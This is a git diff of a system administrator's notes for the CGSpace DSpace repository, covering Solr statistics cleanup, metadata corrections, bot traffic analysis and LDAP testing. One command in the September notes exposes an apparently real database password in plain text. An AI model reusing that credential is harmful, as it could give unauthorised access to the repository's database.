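The returned ids are the candidates for a `DELETE FROM collection2item WHERE id=...` like the ones shown above.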
     
    • Update countries on CGSpace to be closer to ISO 3166-1 with some minor differences based on Peter’s preferred display names
    @@ -229,11 +229,11 @@ dspace=# DELETE FROM collection2item WHERE id='128819'; cg.coverage.country,correct CAPE VERDE,CABO VERDE COCOS ISLANDS,COCOS (KEELING) ISLANDS -"CONGO, DR","CONGO, DEMOCRATIC REPUBLIC OF" -COTE D'IVOIRE,CÔTE D'IVOIRE -"KOREA, REPUBLIC","KOREA, REPUBLIC OF" -PALESTINE,"PALESTINE, STATE OF" -$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228 +"CONGO, DR","CONGO, DEMOCRATIC REPUBLIC OF" +COTE D'IVOIRE,CÔTE D'IVOIRE +"KOREA, REPUBLIC","KOREA, REPUBLIC OF" +PALESTINE,"PALESTINE, STATE OF" +$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
    • I had to restart Tomcat 7 three times before all the Solr statistics cores came up properly
        @@ -267,7 +267,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
      • I checked the nginx logs around 5PM yesterday to see who was accessing the server:
      -
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
      +
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
       
      • I see the Macaroni Bros are using their new user agent for harvesting: RTB website BOT
          @@ -276,7 +276,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
      -
      $ cat dspace.log.2020-08-04 | grep -E "(63.32.242.35|64.62.202.71)" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2020-08-04 | grep -E "(63.32.242.35|64.62.202.71)" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       5693
       
      • DSpace itself uses a case-sensitive regex for user agents so there are no hits from those IPs in Solr, but I need to tweak the other regexes so they don’t misuse the resources @@ -291,9 +291,9 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
      • A few more IPs causing lots of Tomcat sessions yesterday:
      -
      $ cat dspace.log.2020-08-04 | grep "38.128.66.10" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2020-08-04 | grep "38.128.66.10" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       1585
      -$ cat dspace.log.2020-08-04 | grep "64.62.202.71" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2020-08-04 | grep "64.62.202.71" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       5691
       
      • 38.128.66.10 isn’t creating any Solr statistics due to our DSpace agents pattern, but they are creating lots of sessions so perhaps I need to force them to use one session in Tomcat:
      • @@ -318,8 +318,8 @@ Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
      • And another IP belonging to Turnitin (the alternate user agent of Turnitinbot):
      -
      $ cat dspace.log.2020-08-04 | grep "199.47.87.145" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2020-08-04 | grep "199.47.87.145" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2777
       
      • I will add Turnitin to the Tomcat Crawler Session Manager Valve regex as well…
      • @@ -377,8 +377,8 @@ on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
        • The Atmire stats processing for the statistics-2018 Solr core keeps stopping with this error:
        -
        Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
        -java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
        +
        Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
        +java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.storeOnServer(SourceFile:317)
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:177)
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
        @@ -398,71 +398,71 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
         
    -
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/[0-9]+/</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/[0-9]+/</query></delete>'
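The delete-by-query requests in these notes all send the same small XML body. Here is a Python sketch of building that body safely (so characters like `<` in a query get escaped) and posting it. The function names are invented; `post_delete` needs a running Solr and is defined but not called:

```python
import urllib.request
import xml.etree.ElementTree as ET


def build_delete_payload(query):
    """Build a Solr delete-by-query XML body, escaping the query text."""
    delete = ET.Element("delete")
    ET.SubElement(delete, "query").text = query
    return ET.tostring(delete, encoding="unicode")


def post_delete(update_url, query):
    """POST the payload to a Solr update URL (needs a running Solr)."""
    request = urllib.request.Request(
        update_url,
        data=build_delete_payload(query).encode("utf-8"),
        headers={"Content-Type": "text/xml"},
    )
    with urllib.request.urlopen(request) as response:
        return response.status


payload = build_delete_payload("id:/[0-9]+/")
print(payload)
```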
     

    2020-08-09

    • The Atmire script did something to the server and created 132GB of log files so the root partition ran out of space…
    • I removed the log file and tried to re-run the process but it seems to be looping over 11,000 records and failing, creating millions of lines in the logs again:
    -
    # grep -oE "Record uid: ([a-f0-9\\-]*){1} couldn't be processed" /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 > /tmp/not-processed-errors.txt
    +
    # grep -oE "Record uid: ([a-f0-9\\-]*){1} couldn't be processed" /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 > /tmp/not-processed-errors.txt
     # wc -l /tmp/not-processed-errors.txt
     2202973 /tmp/not-processed-errors.txt
     # sort /tmp/not-processed-errors.txt | uniq -c | tail -n 10
    -    220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
    -    220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
    -    220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
    -    220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
    -    220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
    -    221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
    -    220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
    -    220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
    -    221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
    -    221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
    +    220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
    +    220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
    +    220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
    +    220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
    +    220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
    +    221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
    +    220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
    +    220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
    +    221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
    +    221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
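The `sort | uniq -c` step above is a frequency count per record uid. A minimal Python sketch of the same idea, assuming log lines that contain the "Record uid: ... couldn't be processed" message; the sample list reuses two uids from the output above but the repetition counts are invented:

```python
import re
from collections import Counter

UID_RE = re.compile(r"Record uid: ([a-f0-9-]+) couldn't be processed")


def count_failures(lines):
    """Count how often each record uid appears in the error messages."""
    counts = Counter()
    for line in lines:
        match = UID_RE.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts


# Sample lines built from two uids shown above; counts here are illustrative.
sample = [
    "Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed",
    "Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed",
    "Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed",
    "some unrelated log line",
]
failures = count_failures(sample)
print(len(failures), failures.most_common(1))
```

`len(failures)` gives the number of distinct failing records, which is the figure that matters when deciding how many to delete.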
     
    • I looked at some of those records and saw strange objects in their containerCommunity, containerCollection, etc…
    {
    -  "responseHeader": {
    -    "status": 0,
    -    "QTime": 0,
    -    "params": {
    -      "q": "uid:fff1349d-79d5-4ceb-89a1-ce78107d982d",
    -      "indent": "true",
    -      "wt": "json",
    -      "_": "1596957629970"
    +  "responseHeader": {
    +    "status": 0,
    +    "QTime": 0,
    +    "params": {
    +      "q": "uid:fff1349d-79d5-4ceb-89a1-ce78107d982d",
    +      "indent": "true",
    +      "wt": "json",
    +      "_": "1596957629970"
         }
       },
    -  "response": {
    -    "numFound": 1,
    -    "start": 0,
    -    "docs": [
    +  "response": {
    +    "numFound": 1,
    +    "start": 0,
    +    "docs": [
           {
    -        "containerCommunity": [
    -          "155",
    -          "155",
    -          "{set=null}"
    +        "containerCommunity": [
    +          "155",
    +          "155",
    +          "{set=null}"
             ],
    -        "uid": "fff1349d-79d5-4ceb-89a1-ce78107d982d",
    -        "containerCollection": [
    -          "1099",
    -          "830",
    -          "{set=830}"
    +        "uid": "fff1349d-79d5-4ceb-89a1-ce78107d982d",
    +        "containerCollection": [
    +          "1099",
    +          "830",
    +          "{set=830}"
             ],
    -        "owningComm": [
    -          "155",
    -          "155",
    -          "{set=null}"
    +        "owningComm": [
    +          "155",
    +          "155",
    +          "{set=null}"
             ],
    -        "isInternal": false,
    -        "isBot": false,
    -        "statistics_type": "view",
    -        "time": "2018-05-08T23:17:00.157Z",
    -        "owningColl": [
    -          "1099",
    -          "830",
    -          "{set=830}"
    +        "isInternal": false,
    +        "isBot": false,
    +        "statistics_type": "view",
    +        "time": "2018-05-08T23:17:00.157Z",
    +        "owningColl": [
    +          "1099",
    +          "830",
    +          "{set=830}"
             ],
    -        "_version_": 1621500445042147300
    +        "_version_": 1621500445042147300
           }
         ]
       }
    @@ -470,8 +470,8 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
     
    • I deleted those 11,724 records with the strange “set” object in the collections and communities, as well as 360,000 records with id: -1
    -
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    -$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:\-1</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    +$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:\-1</query></delete>'
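
The two delete requests above post a small XML body to the core's update handler. As a rough sketch, the same body could be built in Python before sending it. The helper name `build_delete_query` is hypothetical and the code only constructs the payload, it does not contact Solr:

```python
from xml.sax.saxutils import escape


def build_delete_query(query: str) -> str:
    """Wrap a Solr query string in a delete-by-query XML body.

    Hypothetical helper for illustration; it is not part of DSpace or Solr.
    """
    # Escape &, < and > so the query text cannot break the XML document
    return f"<delete><query>{escape(query)}</query></delete>"


# The two queries used in the curl commands above
print(build_delete_query("owningColl:/.*set.*/"))
print(build_delete_query(r"id:\-1"))
```

Escaping matters mostly for queries that contain `&` or `<`; the two queries used here pass through unchanged.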
     
    • I was going to compare the CUA stats for 2018 and 2019 on CGSpace and DSpace Test, but after Linode rebooted CGSpace (linode18) for maintenance yesterday, the Solr cores didn’t all come back up OK
        @@ -487,24 +487,24 @@ $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=tru
      $ cat 2020-08-09-add-ILRI-orcids.csv
       dc.contributor.author,cg.creator.id
      -"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
      -"Delia Grace","Delia Grace: 0000-0002-0195-9489"
      -"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
      -"Ngan Tran Thi","Tran Thi Ngan: 0000-0002-7184-3086"
      -"Dang Xuan Sinh","Sinh Dang-Xuan: 0000-0002-0522-7808"
      -"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0001-9877-0596"
      -"Pham Van Hung","Pham Anh Hung: 0000-0001-9366-0259"
      -"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
      -"Teufel, Nils","Nils Teufel: 0000-0001-5305-6620"
      -"Duncan, Alan J.","Alan Duncan: 0000-0002-3954-3067"
      -"Moodley, Arshnee","Arshnee Moodley: 0000-0002-6469-3948"
      +"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
      +"Delia Grace","Delia Grace: 0000-0002-0195-9489"
      +"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
      +"Ngan Tran Thi","Tran Thi Ngan: 0000-0002-7184-3086"
      +"Dang Xuan Sinh","Sinh Dang-Xuan: 0000-0002-0522-7808"
      +"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0001-9877-0596"
      +"Pham Van Hung","Pham Anh Hung: 0000-0001-9366-0259"
      +"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
      +"Teufel, Nils","Nils Teufel: 0000-0001-5305-6620"
      +"Duncan, Alan J.","Alan Duncan: 0000-0002-3954-3067"
      +"Moodley, Arshnee","Arshnee Moodley: 0000-0002-6469-3948"
       
      • That got me curious, so I generated a list of all the unique ORCID identifiers we have in the database:
      dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240) TO /tmp/2020-08-09-orcid-identifiers.csv;
       COPY 2095
       dspace=# \q
      -$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq > /tmp/2020-08-09-orcid-identifiers-uniq.csv
      +$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq > /tmp/2020-08-09-orcid-identifiers-uniq.csv
       $ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
       1949 /tmp/2020-08-09-orcid-identifiers-uniq.csv
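
The `grep | sort | uniq` step above can also be sketched in Python. This is a minimal illustration that reuses the same permissive `[A-Z0-9]` pattern; the function name `unique_orcids` and the sample lines are assumptions made for the example:

```python
import re

# Four groups of four characters separated by hyphens, mirroring the
# pattern passed to grep above
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def unique_orcids(lines):
    """Return the sorted, de-duplicated identifiers found in the given lines."""
    found = set()
    for line in lines:
        found.update(ORCID_PATTERN.findall(line))
    return sorted(found)


# Sample values in the "Name: identifier" form used by cg.creator.id
sample = [
    "Delia Grace: 0000-0002-0195-9489",
    "Grace, Delia: 0000-0002-0195-9489",
    "Derek Baker: 0000-0001-6020-6973",
]
print(unique_orcids(sample))
```

Collecting into a set before sorting plays the role of `sort | uniq`, so two name variants with the same identifier count once.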
       
        @@ -517,9 +517,9 @@ $ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
    -
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
     ...
    -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
     
    • I added Googlebot and Twitterbot to the list of explicitly allowed bots
        @@ -573,7 +573,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=tru
        • Last night I started the processing of the statistics-2016 core with the Atmire stats util and I see some errors like this:
        -
        Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
        +
        Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
         com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: f6b288d7-d60d-4df9-b311-1696b88552a0, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
        @@ -598,8 +598,8 @@ Caused by: java.lang.NullPointerException
         
         
      • I purged the unmigrated docs and continued processing:
      -
      $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
      -$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
      +
      $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
      +$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
       $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
       
      • Altmetric asked for a dump of CGSpace’s OAI “sets” so they can update their affiliation mappings @@ -608,8 +608,8 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
    -
    $ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' > /tmp/0.xml
    -$ for num in {100..1300..100}; do http "https://cgspace.cgiar.org/oai/request?verb=ListSets&resumptionToken=////$num" > /tmp/$num.xml; sleep 2; done
    +
    $ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' > /tmp/0.xml
    +$ for num in {100..1300..100}; do http "https://cgspace.cgiar.org/oai/request?verb=ListSets&resumptionToken=////$num" > /tmp/$num.xml; sleep 2; done
     $ for num in {0..1300..100}; do cat /tmp/$num.xml >> /tmp/cgspace-oai-sets.xml; done
     
    • This produces one file that has all the sets, albeit with 14 pages of responses concatenated into one document, but that’s how theirs was in the first place…
    • @@ -620,9 +620,9 @@ $ for num in {0..1300..100}; do cat /tmp/$num.xml >> /tmp/cgspace-oai-sets
    • The com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script that was processing 2015 records last night started spitting shit tons of errors and created 120GB of logs…
    • I looked at a few of the UIDs that it was having problems with and they were unmigrated ones… so I purged them in 2015 and all the rest of the statistics cores
    -
    $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
     ...
    -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
     

    2020-08-19

    • I tested the DSpace 5 and DSpace 6 versions of the country code tagger curation task and noticed a few things @@ -715,17 +715,17 @@ $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=tru
    -
    $ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=0' User-Agent:'curl' > /tmp/wle-trade-off-page1.xml
    -$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=100' User-Agent:'curl' > /tmp/wle-trade-off-page2.xml
    -$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=200' User-Agent:'curl' > /tmp/wle-trade-off-page3.xml
    +
    $ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=0' User-Agent:'curl' > /tmp/wle-trade-off-page1.xml
    +$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=100' User-Agent:'curl' > /tmp/wle-trade-off-page2.xml
    +$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=200' User-Agent:'curl' > /tmp/wle-trade-off-page3.xml
     
    -
    $ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page1.xml >> /tmp/ids.txt
    -$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page2.xml >> /tmp/ids.txt
    -$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page3.xml >> /tmp/ids.txt
    +
    $ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page1.xml >> /tmp/ids.txt
    +$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page2.xml >> /tmp/ids.txt
    +$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page3.xml >> /tmp/ids.txt
     $ sort -u /tmp/ids.txt > /tmp/ids-sorted.txt
    -$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt > /tmp/handles.txt
    +$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt > /tmp/handles.txt
     
    • Now I have all the handles for the matching items and I can use the REST API to get each item’s PDFs…
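
For reference, the handle extraction could be sketched in Python as well. It assumes each entry ID is a handle URL such as `https://cgspace.cgiar.org/handle/10568/111` (the example values below are made up), and the function name `extract_handles` is hypothetical:

```python
import re

# Same pattern as the grep command above: digits, a slash, then digits
HANDLE_PATTERN = re.compile(r"[0-9]+/[0-9]+")


def extract_handles(text):
    """Return the handles found in text, de-duplicated in first-seen order."""
    # dict.fromkeys keeps insertion order while dropping repeats
    return list(dict.fromkeys(HANDLE_PATTERN.findall(text)))


# Made-up IDs for illustration only
ids = (
    "https://cgspace.cgiar.org/handle/10568/111\n"
    "https://cgspace.cgiar.org/handle/10568/222\n"
    "https://cgspace.cgiar.org/handle/10568/111\n"
)
print(extract_handles(ids))
```

De-duplicating here avoids requesting the same item twice when one handle appears on more than one result page.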
        diff --git a/docs/2020-09/index.html b/docs/2020-09/index.html index 96fe71b1c..d3946d8f2 100644 --- a/docs/2020-09/index.html +++ b/docs/2020-09/index.html @@ -48,7 +48,7 @@ I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39 I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40 "/> - + @@ -173,7 +173,7 @@ $ grep -c added /tmp/2020-09-02-countrycodetagger.log
    • I tried to query LDAP directly using the application credentials with ldapsearch and it works:
    -
    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "applicationaccount@cgiarad.org" -W "(sAMAccountName=me)"
    +
    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "applicationaccount@cgiarad.org" -W "(sAMAccountName=me)"
     
    • According to the DSpace 6 docs we need to escape commas in our LDAP parameters due to the new configuration system
        @@ -206,8 +206,8 @@ Report Formally Published Poster Unrefereed reprint -$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68 -$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68 +$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68 +$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68
    • Start reviewing 95 items for IITA (20201stbatch)
        @@ -259,9 +259,9 @@ java.lang.NullPointerException
      • I will update our nearly 6,000 metadata values for CIFOR in the database accordingly:
      -
      dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
      -dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
      -dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
      +
      dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
      +dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
      +dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
       
      • I did some cleanup on the author affiliations of the IITA data against our 2019-04 list using reconcile-csv and OpenRefine:
          @@ -328,7 +328,7 @@ AFRICA SOUTH OF SAHARA,SUB-SAHARAN AFRICA NORTH AFRICA,NORTHERN AFRICA WEST ASIA,WESTERN ASIA SOUTHWEST ASIA,SOUTHWESTERN ASIA -$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n +$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n Connected to database. Would fix 12227 occurences of: EAST AFRICA Would fix 7996 occurences of: WEST AFRICA @@ -417,7 +417,7 @@ Would fix 3 occurences of: SOUTHWEST ASIA
      -
      value + "__description:" + cells["dc.type"].value
      +
      value + "__description:" + cells["dc.type"].value
       
      • Then I created a SAF bundle with SAFBuilder:
      @@ -477,9 +477,9 @@ Would fix 3 occurences of: SOUTHWEST ASIA
    $ cat 2020-09-17-add-bioversity-orcids.csv
     dc.contributor.author,cg.creator.id
    -"Etten, Jacob van","Jacob van Etten: 0000-0001-7554-2558"
    -"van Etten, Jacob","Jacob van Etten: 0000-0001-7554-2558"
    -$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
    +"Etten, Jacob van","Jacob van Etten: 0000-0001-7554-2558"
    +"van Etten, Jacob","Jacob van Etten: 0000-0001-7554-2558"
    +$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
     
    • I sent a follow-up message to Atmire to look into the two remaining issues with the DSpace 6 upgrade
        @@ -496,7 +496,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dsp
    -
    https://cgspace.cgiar.org/open-search/discover?query=type:"Journal Article" AND status:"Open Access" AND crpsubject:"Water, Land and Ecosystems" AND "tradeoffs"&rpp=100
    +
    https://cgspace.cgiar.org/open-search/discover?query=type:"Journal Article" AND status:"Open Access" AND crpsubject:"Water, Land and Ecosystems" AND "tradeoffs"&rpp=100
     
    • I noticed that my move-collections.sh script didn’t work on DSpace 6 because of the change from IDs to UUIDs, so I modified it to quote the collection resource_id parameters in the PostgreSQL query
    @@ -538,7 +538,7 @@ dspacestatistics=# SELECT SUM(downloads) FROM items;
